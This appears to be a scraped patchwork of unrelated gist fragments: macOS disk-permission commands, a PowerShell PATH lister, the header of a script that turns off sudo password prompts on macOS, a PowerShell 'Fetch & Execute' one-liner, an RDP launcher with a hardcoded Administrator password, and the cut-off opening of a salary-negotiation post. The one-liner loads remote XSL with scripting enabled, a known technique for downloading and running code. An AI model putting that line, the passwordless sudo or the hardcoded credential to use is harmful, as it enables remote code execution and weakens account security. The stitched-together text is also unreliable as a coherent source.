Verify Permissions
diskutil verifyPermissions /
Repair Permissions
diskutil repairPermissions /
| $env:Path.split(";") | ForEach-Object { | |
| Get-ChildItem -Path $_ -ErrorAction SilentlyContinue | |
| } | Where-Object { $env:PATHEXT.ToLower() -match $_.Extension.ToLower() } | Select-Object FullName |
| #!/bin/bash | |
| # | |
| # Enable nopasswd mode for sudo on macOS from the userspace in fast and totally non-interactive way | |
| # | |
| # Type the password last time to apply the new mode and forget it for any console task for ages | |
| # Use the rollback to restore password protection | |
| # | |
| # Developed and tested by https://juliyvchirkov.github.io/ under the MIT license on macOS Big Sur 11.2.0 | |
| # | |
| # Get latest version at https://gist.github.com/juliyvchirkov/3ca76582ed6b6a8366c9e7d60644960d |
| ############################################################################## | |
| ### Powershell Xml/Xsl Assembly "Fetch & Execute" | |
| ### [https://twitter.com/bohops/status/966172175555284992] | |
| $s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.github.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.github.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z; | |
| ############################################################################## | |
| ### Powershell VBScript Assembly SCT "Fetch & Execute" | |
| ### [https://twitter.com/bohops/status/965670898379476993] |
| Write-Host "Checking for Administrator permission..." | |
| if (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { | |
| Write-Warning "Insufficient permissions to run this script. Open the PowerShell console as administrator and run this script again." | |
| Break | |
| } else { | |
| Write-Host "Running as administrator — continuing execution..." -ForegroundColor Green | |
| } | |
| $patchfile = $args[0] | |
| echo "Connecting to 192.168.1.100" | |
| $Server="192.168.1.100" | |
| $User="Administrator" | |
| $Password="AdminPassword" | |
| cmdkey /generic:TERMSRV/$Server /user:$User /pass:$Password | |
| mstsc /v:$Server |
I hereby claim:
To claim this, I am signing this object:
Source: Unknown
A lot of people don’t know how to negotiate a job offer, especially if they were going to accept it no matter what. Use this technique to get an increase in the offer, which will compound every year since raises are almost always percentages or “bump up to the nearest big number”. Doing this at my last salary negotiation has probably payed off in the range of tens of thousands of dollars over several years.
Allow me to present Gavin's Super Simple Job Offer Negotiation Strategy for People Who Hate Negotiation, Don’t Have Any Other Offers, and Are Going To Take the Job No Matter What:
Call 1: They call you to make the offer